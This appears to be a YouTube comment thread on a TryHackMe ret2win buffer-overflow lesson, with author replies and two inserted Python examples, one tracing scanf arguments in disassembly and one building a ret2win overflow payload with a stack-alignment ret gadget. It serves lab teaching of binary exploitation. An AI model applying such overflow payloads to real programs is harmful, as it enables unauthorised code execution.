Execution Flow Hijacking (ret2win) - pwn103 - PWN101 | TryHackMe

  • Published 3 Nov 2024

COMMENTS • 39

  • @christiansanchez4883 · 1 year ago · +2

    You are literally the best at explaining this! I've been going through tutorials and none have addressed the stack alignment issue. This has finally solved issues I've been stuck on for weeks. I wish I could give you more likes.

  • @eyalshain5244 · 1 month ago · +1

    Very helpful!
    Please keep doing more of this binary exploitation / reverse engineering stuff... and even if you can do some forensics stuff that will be awesome!
    Anyway, thanks

  • @ratlinuxgamer2855 · 2 years ago · +3

    What I like the most is how you explain the theory. Thanks mate.

  • @katchen2626 · 11 months ago

    why are you SO AWESOME
    i've been looking EVERYWHERE for someone to explain stack addressing, and nobody did it as perfectly and precisely and briefly as YOU. THANK YOUUUU

    • @RazviOverflow · 8 months ago

      You are welcome, glad to help :)

  • @regas6441 · 9 months ago

    Thanks for the explanation on the MOVAPS issue, been getting it and didn't really understand what was going on.

  • @mmelt · 1 year ago

    Incredibly well presented. Don't forget to register Sublime Text!

  • @davidshipman5964 · 11 months ago

    Great video! I learned a lot. It is crazy that you can do things like this lol

  • @rgb123-jm5mc · 4 months ago

    your explanations are very very good! Towards the end, when you mentioned padding an extra 'ret' onto the stack (by overwriting the stack using the buffer overflow vulnerability), I assume this extra return instruction's address is popped so code execution will begin at that address, which is just another return instruction. Once this executes, it will pop the stack again and direct code execution to the admins_only function. Is that right? By the way, it seems like with PIE disabled, ASLR still applies to other non-text segments.
    Also, is there a way to tell if the stack is 16-byte aligned, or is this 'ret' padding method a technique that may or may not work? Thank you!

    • @RazviOverflow · 4 months ago

      Thank you :)
      The extra ret instruction has no effect from the operational point of view, it just aligns some stuff within the stack frames. It is usually needed on Ubuntu 18.04, due to the MOVAPS issue (which I briefly speak about in the ROP video).

  • @ilabsentuser · 2 years ago · +1

    I am loving this series! This one really had me lost though. There is something I would like to ask. Even though in this case it is obvious (as s1 is the only variable in the general function), how do you easily realize that scanf is writing its output there? More specifically in the disassembly view, as in decompiled views it is easy to find. Essentially I would like to understand how to recognize in disassembly when a function writes to a variable; of course you don't have to answer this yourself, pointing me to some docs for it should be enough, I can RTFM hahaha. Thanks in advance! Will try to complete the next chapter alone, this one was a no go xD

    • @RazviOverflow · 2 years ago · +2

      Hi there! Thank you for your kind words. Will continue the series pretty soon (I've been taking a break recently). Answering your question, there are 3 things we have to take into account:
      1. We are dealing with a 64-bit binary. That is, arguments are passed via registers and not via the stack. (You can google how parameters are passed to functions in 32-bit and 64-bit architectures in assembly.)
      2. We are dealing with a Linux binary, so we have to take into account the naming convention (en.wikipedia.org/wiki/X86_calling_conventions#List_of_x86_calling_conventions). The first parameter is taken from RDI, the second from RSI, and so forth....
      3. Right before the scanf call at address 0x40132c (6:43), the parameters are being set. If you've never used scanf before, take a look at the man page man7.org/linux/man-pages/man3/scanf.3.html. You will notice the first parameter is the format string (RDI) and the second one is the buffer (RSI). Now taking a look at the assembly code, instruction 0x40131a is setting the RSI register, whose value will be the address of [s1] because of the previous register. And [s1] is rbp-0x20.
      Cutter does a pretty good job when assigning variable names like s1 to given addresses, but you don't really need them. If you see something like:
          lea rax, [rbp-0x20]
          mov rsi, rax
          ...
          call scanf
      you already know the second parameter of scanf will be rbp-0x20.
      Hope this helps!

    • @ilabsentuser · 2 years ago · +1

      @@RazviOverflow Ah, I see, I was making some wrong assumptions there. I am reading up on what you mentioned and it is very informative. Will keep reading about it after work, but I have to say that this info is exactly what I needed; I think I did not know exactly what to search for though, as it seems it was easily reachable :(, so thanks again for pointing me in the right direction. Will keep digging at it :)

    • @RazviOverflow · 2 years ago · +2

      @@ilabsentuser Glad to help, and ask whenever you consider!
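The reply above explains how to tell, from raw disassembly, which stack slot a call writes into: take the register that carries the argument you care about (rsi for scanf's second parameter) and follow it backwards to the lea that produced it. The block below is an added example that automates that backward walk over a short disassembly listing; it is not code from the video, from RazviOverflow or from TryHackMe. The listing, its addresses and the `__isoc99_scanf`/`printf` symbol names are constructed for the example, and only the mov/lea forms shown in the reply are tracked.

```python
# Added example (not code from the video, RazviOverflow or TryHackMe): given a
# disassembly listing, find where a call's argument registers were loaded, so
# you can tell which stack slot a function such as scanf writes into.
import re

# x86-64 System V integer argument registers, in order (rdi = 1st, rsi = 2nd, ...).
ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]
# 32-bit names write the low half of the same 64-bit register.
ALIASES = {"edi": "rdi", "esi": "rsi", "edx": "rdx", "ecx": "rcx",
           "r8d": "r8", "r9d": "r9", "eax": "rax"}
REGS = set(ARG_REGS) | {"rax", "rbx", "rbp", "rsp", "r10", "r11"} | set(ALIASES)

# Constructed listing mirroring the pattern in the reply above: the scanf call
# is preceded by lea rax, [rbp-0x20]; mov rsi, rax. Addresses and the format
# string offsets are made up for the example.
LISTING = """\
0x401300  lea   rax, [rip+0xd01]
0x401307  mov   rdi, rax
0x40130a  mov   eax, 0
0x40130f  call  printf
0x401314  lea   rax, [rbp-0x20]
0x401318  mov   rsi, rax
0x40131b  lea   rax, [rip+0xcf0]
0x401322  mov   rdi, rax
0x401325  mov   eax, 0
0x40132a  call  __isoc99_scanf
"""

INSN_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+)\s+(\w+)\s*(.*)$")

def parse_listing(text):
    """Turn 'addr mnemonic op1, op2' lines into (addr, mnemonic, [operands])."""
    insns = []
    for line in text.splitlines():
        m = INSN_RE.match(line)
        if not m:
            continue
        addr, mnem, ops = m.groups()
        operands = [o.strip() for o in ops.split(",")] if ops else []
        insns.append((int(addr, 16), mnem, operands))
    return insns

def norm(reg):
    return ALIASES.get(reg, reg)

def resolve_call_args(insns, callee, nargs):
    """Walk backwards from `call callee` and report where each of the first
    `nargs` argument registers got its value. '&expr' means the address of a
    memory operand (from lea); otherwise it is the immediate or memory operand
    that was moved in. Stops at the previous call: the argument registers and
    rax are caller-saved, so nothing set before it survives into this call."""
    idx = next(i for i, (_, mnem, ops) in enumerate(insns)
               if mnem == "call" and ops and ops[0] == callee)
    # register -> argument slots still waiting for their defining instruction
    pending = {reg: [reg] for reg in ARG_REGS[:nargs]}
    resolved = {}
    for _, mnem, ops in reversed(insns[:idx]):
        if mnem == "call":
            break
        if len(ops) != 2:
            continue
        dst, src = norm(ops[0]), ops[1]
        if dst not in pending:
            continue
        slots = pending.pop(dst)
        if mnem == "lea":
            for slot in slots:
                resolved[slot] = "&" + src.strip("[]")
        elif mnem == "mov" and src in REGS:
            # value came from another register: keep following that one
            pending.setdefault(norm(src), []).extend(slots)
        elif mnem == "mov":
            for slot in slots:
                resolved[slot] = src
        else:
            for slot in slots:
                resolved[slot] = "unknown (" + mnem + ")"
    for slots in pending.values():
        for slot in slots:
            resolved[slot] = "unknown (set before the previous call)"
    return resolved

def scanf_buffer(listing):
    """Where scanf's second argument (the buffer) points: here '&rbp-0x20'."""
    return resolve_call_args(parse_listing(listing), "__isoc99_scanf", 2)["rsi"]

if __name__ == "__main__":
    print(resolve_call_args(parse_listing(LISTING), "__isoc99_scanf", 2))
```

Run on the constructed listing it reports rsi as `&rbp-0x20` and rdi as the rip-relative format string, which is exactly the reading the reply does by eye. Real Cutter output uses symbol names like `sym.imp.__isoc99_scanf` and may show offsets relative to rsp instead of rbp, so adjust the callee name and the operand text before feeding it in.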

  • @danielcmihai · 2 years ago

    Nicely done mate!! Top

  • @rhyswong6779 · 7 months ago

    Sorry, as I am kind of new to using Cutter, but when I use Cutter on my end my theory is that it somehow adds the 0x8 of the ebp to the variable? So instead of it being 0x20 like in the video it's 0x28. I say this because my exploit doesn't work if I add the extra padding for the 8 bytes on top of 0x28.

    • @RazviOverflow · 7 months ago

      Hello, take a look at this question: reverseengineering.stackexchange.com/questions/32317/cutter-shows-addresses-relative-to-stack-but-not-rbp-how-to-change-it

  • @Sh3lld0n · 2 years ago

    Great video!
    Can you say how you install decompiler for cutter?
    Thanks

    • @RazviOverflow · 2 years ago

      Thank you! The decompiler is installed by default. From their repo I download the AppImage file and simply execute it.

  • @lanadweikk · 1 year ago

    I don't understand why sometimes we use "p64" and other times "p32", can you please explain?

    • @RazviOverflow · 1 year ago

      p64() packs a 64-bit int (8 bytes), while p32() packs a 32-bit int (4 bytes). docs.pwntools.com/en/stable/util/packing.html#pwnlib.util.packing.p32
      Depending on the number of bytes you are trying to pack you must use one or the other.

  • @00habib00 · 2 years ago

    great man!!!

  • @shirosaomd7146 · 7 days ago

    What will you do if the flag() address contains bad characters?

    • @RazviOverflow · 7 days ago

      In case that happens, you can try jumping to adjacent addresses if they also do the job. Otherwise you'd have to find alternative solutions.

  • @JoPraveen · 2 years ago

    Nicee ✨💯

  • @incursio1122 · 8 months ago

    You are god🙏🙏

  • @shajahanup7795 · 4 months ago

    Hey, I am getting a "stopped with exit code -11 (SIGSEGV)" error while trying this example.
    Welcome admin 😄
    [*] Got EOF while reading in interactive
    I am getting this output but I am not able to use the shell for anything,
    and `payload = b"A"*0x28 + admins_only_address` is my payload.
    Anyway, thanks for the help, really helpful videos

  • @samfisher8426 · 2 years ago

    p64 is not working for me??
    What's the alternative for this?

    • @RazviOverflow · 2 years ago

      How is it that p64 does not work? The alternative is using struct, native to python.
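Three questions in this thread meet in the exploit script: p64 versus p32 (and `struct` as the fallback when pwntools is unavailable, as the reply above says), the extra `ret` for the MOVAPS alignment issue, and what to do when a target address contains bad characters. The block below is an added example, not code from the video, RazviOverflow or TryHackMe. It rebuilds the packing helpers on `struct` and assembles the ret2win payload from the layout the comments describe: a 0x20-byte buffer at rbp-0x20 followed by 8 bytes of saved rbp, so the return address sits at offset 0x28. The addresses 0x401186, 0x40100a and 0x40122e, placing admins_only at 0x401186, and the assumption that the input is read with scanf("%s") are mine, not taken from the page.

```python
# Added example (not code from the video, RazviOverflow or TryHackMe): the
# pwntools packing helpers rebuilt with Python's struct module, plus the ret2win
# payload layout discussed in this thread. Assumptions, not taken from the page:
# the input is read with scanf("%s"), and every address below is made up.
import struct

def p64(value):
    """Pack an int as 8 little-endian bytes, as pwntools' p64 does on amd64."""
    return struct.pack("<Q", value)

def p32(value):
    """Pack an int as 4 little-endian bytes (pwntools' p32, for 32-bit targets)."""
    return struct.pack("<I", value)

def u64(data):
    """Inverse of p64: 8 bytes back to an int (pwntools' u64)."""
    return struct.unpack("<Q", data)[0]

# scanf("%s") stops at the first whitespace byte, so none of these can be sent.
# NUL is fine: %s copies it, so the high zero bytes of a 0x0040xxxx address survive.
SCANF_BADCHARS = b"\x09\x0a\x0b\x0c\x0d\x20"

def bad_chars(packed, badchars=SCANF_BADCHARS):
    """Bytes of `packed` that the input routine would eat, in order of appearance."""
    return [b for b in packed if b in badchars]

def check_chain(addresses, badchars=SCANF_BADCHARS):
    """Addresses whose 8-byte encoding contains a bad byte."""
    return [a for a in addresses if bad_chars(p64(a), badchars)]

def pick_ret_gadget(candidates, badchars=SCANF_BADCHARS):
    """First `ret` address that packs cleanly, else None (then try a neighbour)."""
    for addr in candidates:
        if not bad_chars(p64(addr), badchars):
            return addr
    return None

# Buffer at rbp-0x20 (0x20 bytes), then the saved rbp (8 bytes), then the
# saved return address: so the return address starts 0x28 bytes in.
BUF_SIZE = 0x20
OFFSET = BUF_SIZE + 8

def build_payload(target, ret_gadget=None, offset=OFFSET, badchars=SCANF_BADCHARS):
    """Overwrite the saved return address with `target`.

    With `ret_gadget` set, one extra `ret` goes first. The vulnerable function's
    own `ret` leaves rsp 16-byte aligned, but a function expects rsp to be 8 mod
    16 on entry (as if a `call` had just pushed the return address). Returning
    straight into `target` is therefore off by 8 and a `movaps` to a stack slot
    faults; the extra `ret` pops 8 more bytes and restores the expected
    alignment before `target` runs."""
    chain = ([ret_gadget] if ret_gadget is not None else []) + [target]
    broken = check_chain(chain, badchars)
    if broken:
        raise ValueError("bad bytes in " + ", ".join(hex(a) for a in broken))
    return b"A" * offset + b"".join(p64(a) for a in chain)

if __name__ == "__main__":
    # Made-up addresses: admins_only at 0x401186, two candidate ret gadgets.
    ADMINS_ONLY = 0x401186
    gadget = pick_ret_gadget([0x40100a, 0x40122e])   # 0x40100a packs a '\n'
    payload = build_payload(ADMINS_ONLY, ret_gadget=gadget)
    print(payload.hex())
```

Finding candidate `ret` addresses (with ROPgadget or similar) is outside the block; pick_ret_gadget only filters the list you give it, which is the "jump to an adjacent address" advice from the bad-characters reply made mechanical. To deliver the payload, wrap it with pwntools' process()/sendline() as in the video, or pipe it into the binary's stdin.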

  • @Hellohellohello803 · 11 months ago

    This is script kiddie s**t. 😂